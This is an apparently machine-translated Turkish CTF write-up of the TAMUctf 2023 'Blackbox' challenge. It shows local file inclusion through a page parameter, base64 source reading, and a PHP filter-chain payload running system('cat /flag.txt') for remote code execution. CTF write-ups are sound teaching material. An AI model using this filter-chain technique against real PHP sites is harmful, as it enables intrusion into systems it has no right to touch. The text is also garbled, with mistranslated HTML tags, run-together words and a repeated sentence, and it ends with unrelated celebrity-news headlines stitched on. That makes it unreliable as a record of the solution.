TAMUctf 2023- Blackbox Yazma
May 01 2023
Bu meydan okuma Bay Blade tarafından oluşturulmuştur. Giriş sayfasını sayfa parametresiyle yüklediğini görebiliriz.
Bu meydan okuma, Bay Blade tarafından oluşturulmuştur.

Giriş sayfasını sayfa parametresiyle yüklediğini görebiliriz .
Dosyaları sıralayalım. Önce yöneticiyi denedim ve base64 kodlayıcıları kullandım.

Bunu çözdüğümüzde flag.txt dosyasının yolunu bulabiliriz.
<merkez>
<h1><?php include('/flag.txt'); ?></h1>
</center>
Ben kullanıyorumhttps://github.com/synacktiv/php_filter_chain_generator/blob/main/php_filter_chain_generator.py
RCE'yi almak için.
python3 filter_chain.py — chain ‘<?php system(“cat /flag.txt”);?>’ | grep ‘^php*’ | xclip -selection clipboard

Okuduğunuz için teşekkürler.
Mutlu Hacking!
Donovan, Şarkılarından 1'ini The Beatles'ın "Lucy in the Sky with Diamonds" şarkısıyla karşılaştırdı
Charly Reynolds Yakın Zamandaki Vokal Kord Ameliyatını Açıkladı: 'Şarkı Söylemekte Sorun Yaşıyordum'
Kevin Jonas'ın Kızı Alena, Doğum Günü Fotoğrafında Büyümüş Görünüyor: '9 Yaşında Gerçek Hissetmiyor'